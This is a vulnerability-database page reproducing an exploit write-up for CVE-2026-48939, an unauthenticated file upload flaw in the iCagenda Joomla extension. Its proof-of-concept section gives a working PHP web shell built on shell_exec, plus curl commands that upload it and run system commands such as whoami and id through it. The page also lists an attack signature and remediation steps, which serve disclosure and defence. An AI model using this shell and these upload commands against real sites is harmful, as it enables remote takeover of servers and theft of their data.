Lucene search
K

๐Ÿ“„ ICagenda 3.9.14 / 4.0.7 Shell Upload

๐Ÿ—“๏ธย 29 Jun 2026ย 00:00:00Reported byย PolosssTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 34ย Views

CVE-2026-48939 exposes unauthenticated iCagenda file uploads that allow remote code execution on Joomla sites.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2026-48939
29 Jun 202611:09
โ€“githubexploit
ATTACKERKB
CVE-2026-48939
20 Jun 202611:56
โ€“attackerkb
Circl
CVE-2026-48939
20 Jun 202613:44
โ€“circl
CVE
CVE-2026-48939
20 Jun 202611:56
โ€“cve
Cvelist
CVE-2026-48939 Joomla Extension - icagenda.com - Remote Code Execution in iCaganda extension for Joomla < 4.0.8/3.9.15
20 Jun 202611:56
โ€“cvelist
EUVD
EUVD-2026-38109
20 Jun 202611:56
โ€“euvd
NVD
CVE-2026-48939
20 Jun 202613:16
โ€“nvd
Positive Technologies
PT-2026-51137
20 Jun 202600:00
โ€“ptsecurity
Vulnrichment
CVE-2026-48939 Joomla Extension - icagenda.com - Remote Code Execution in iCaganda extension for Joomla < 4.0.8/3.9.15
20 Jun 202611:56
โ€“vulnrichment
# CVE-2026-48939 - iCagenda Unauthenticated File Upload to RCE
    
    ## Overview
    
    | Field | Value |
    |-------|-------|
    | **CVE ID** | CVE-2026-48939 |
    | **CVSS 4.0 Score** | 10.0 Critical |
    | **CVSS Vector** | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
    | **CWE** | CWE-284: Improper Access Control |
    | **Affected Versions** | iCagenda 3.2.1 - 3.9.14 and 4.0.0 - 4.0.7 |
    | **Fixed In** | iCagenda 4.0.8 and 3.9.15 |
    | **Published** | 20 June 2026 |
    
    ## Vulnerability Description
    
    iCagenda, a popular events and calendar component for Joomla, contains an unauthenticated file upload vulnerability that allows remote attackers to upload and execute arbitrary PHP code on Joomla 6 sites.
    
    ### Technical Details
    
    The vulnerability exists in the frontend event submission form's file attachment feature:
    
    1. **Missing Access Control**: The submit endpoint (`index.php?option=com_icagenda&task=registration.submit`) does not enforce authentication, bypassing the "Registered Only" access setting.
    
    2. **No File Validation**: Uploaded files are saved with their original extension without:
       - Extension allowlist validation
       - MIME type verification
       - File content inspection
    
    3. **Direct File Write**: Files are written to `/images/icagenda/frontend/attachments/[filename]` directly under the web root.
    
    4. **PHP Execution**: On Joomla 6, the uploaded `.php` files are executable, leading to Remote Code Execution (RCE).
    
    ## Proof of Concept
    
    ### Method 1: Using curl (Single Command)
    
    ```bash
    # Create PHP shell payload
    cat > /tmp/shell.php << 'EOF'
    <?php
    echo "CVE-2026-48939 - SHELL ACTIVE\n";
    if(isset($_GET['cmd'])) {
        echo shell_exec($_GET['cmd'] . " 2>&1");
    }
    ?>
    EOF
    
    # Upload the shell
    curl -k -s \
      -F "title=Test Event" \
      -F "jform[attachment]=@/tmp/shell.php;type=application/x-php" \
      "https://poloss-jomola.ddev.site/icagenda_submit.php"
    
    # Execute commands via uploaded shell
    curl -k "https://poloss-jomola.ddev.site/images/icagenda/frontend/attachments/[SHELL_FILENAME].php?cmd=whoami"
    ```
    
    ### Method 2: Using PoC Script
    
    ```bash
    # Navigate to project directory
    
    # Run PoC script
    ./CVE-2026-48939-PoC.sh https://poloss-jomola.ddev.site
    ```
    
    ## Exploitation Steps
    
    1. **Identify vulnerable endpoint**:
       ```
       https://target.com/index.php?option=com_icagenda&task=submit
       ```
    
    2. **Upload PHP web shell**:
       ```bash
       curl -X POST -F "jform[attachment][email protected]" \
         "https://target.com/index.php?option=com_icagenda&task=submit"
       ```
    
    3. **Execute shell**:
       ```bash
       curl "https://target.com/images/icagenda/frontend/attachments/shell_TIMESTAMP.php?cmd=id"
       ```
    
    ## Impact
    
    - **Confidentiality**: Complete loss of confidentiality - attacker can read all files
    - **Integrity**: Complete loss of integrity - attacker can modify all data
    - **Availability**: Complete loss of availability - attacker can deny service
    - **Remote Code Execution**: Full server compromise
    
    ## Attack Signature
    
    Based on real-world exploitation logs, the attack signature is:
    
    ```
    # Step 1: Upload
    POST /index.php?option=com_icagenda&task=submit
    User-Agent: icagenda-batch/1.0
    Content-Disposition: form-data; name="jform[attachment]"; filename="shell.php"
    
    # Step 2: Execute
    GET /images/icagenda/frontend/attachments/shell.php?cmd=...
    User-Agent: icagenda-batch/1.0
    ```
    
    ## Remediation
    
    1. **Immediate**: Update iCagenda to version 4.0.8 (or 3.9.15 for legacy branch)
    2. **Alternative**: Remove or rename `com_icagenda` folders temporarily
    3. **Note**: Unpublishing the component does NOT protect against this vulnerability
    
    ## References
    
    - [iCagenda Zero Day RCE - mysites.guru](https://mysites.guru/blog/icagenda-zero-day-file-upload-rce/)
    - [iCagenda Official](https://www.icagenda.com/)
    - [Changelog 4.0.8](https://www.icagenda.com/docs/changelog/icagenda-4-0-8)
    - [CISA ADP Advisory](https://www.cisa.gov/news-events/alerts)
    
    ## Disclaimer
    
    This PoC is for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal.

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Jun 2026 00:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.19.8
CVSS 410
EPSS0.00522
SSVC
34